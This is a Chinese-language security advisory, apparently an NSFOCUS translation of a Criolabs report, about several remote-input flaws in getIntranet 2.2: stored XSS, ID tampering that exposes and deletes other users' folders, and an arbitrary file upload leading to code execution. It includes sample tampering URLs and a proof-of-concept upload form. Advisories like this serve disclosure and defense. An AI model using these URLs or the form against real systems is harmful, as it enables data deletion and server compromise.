安全研究

安全漏洞
GetSolutions GetIntranet多个远程输入漏洞

发布日期:2004-09-10
更新日期:2004-09-14

受影响系统:
getSolutions getIntranet 2.2
描述:
BUGTRAQ  ID: 11149

getIntranet是一款Intranet基于WEB的实时管理信息,文档内容等的系统。

getIntranet多个脚本对用户提交的输入缺少充分过滤,远程攻击者可以利用这个漏洞获得敏感信息,执行恶意代码,删除用户目录等攻击。

getIntranet的发送消息功能对主题和评论字段数据缺少充分过滤,提交恶意脚本代码诱使用户连接可导致恶意脚本在浏览器上执行,泄露敏感信息。

另外更改ID信息就可以查看和删除其他用户目录如:

   /welcome.asp?id=30&ctype=1&lid=f30&page=folder_detail.asp
   /welcome.asp?page=message.asp&id=4
   /welcome.asp?action=delmessage&id=3

文件上传实现也存在漏洞,Fileupload.asp允许远程验证用户上传文件到服务器,并调用文件以WEB进程权限执行。

<*来源:Criolabs (security@criolabs.net
  
  链接:http://www.criolabs.net/advisories/getintranet.txt
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

Criolabs (security@criolabs.net)提供了如下测试方法:

文件上传:

<form method="post" action="http://VULNERABLEHOST/fileupload.asp" enctype="multipart/form-data" id="form1" name="form1">
<input type="hidden" name="t1" value="25"><input type="hidden" name="t2" value="13">
<input type="file" name="file" value="" size="20" class="formitem">    
<textarea name="t3" size="20" class="textarea" rows="5" cols="40"></textarea>    
<input type="hidden" name="t4" value="1">
<input type="hidden" name="flds" value="4"><input type="hidden" name="proc" value="sp_login_upload_write">
<input type="hidden" name="lid" value=""><input type="hidden" name="upload" value="upload"><input type="hidden" name="customer" value="">
<input type="hidden" name="page" value="login_detail.asp"><input type="hidden" name="basepage" value="welcome.asp"></td>
<input type="submit" name="Action" value="Upload" class="formitembutton">
</form>

建议:
厂商补丁:

getSolutions
------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.getintranet.net/

浏览次数:2738
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障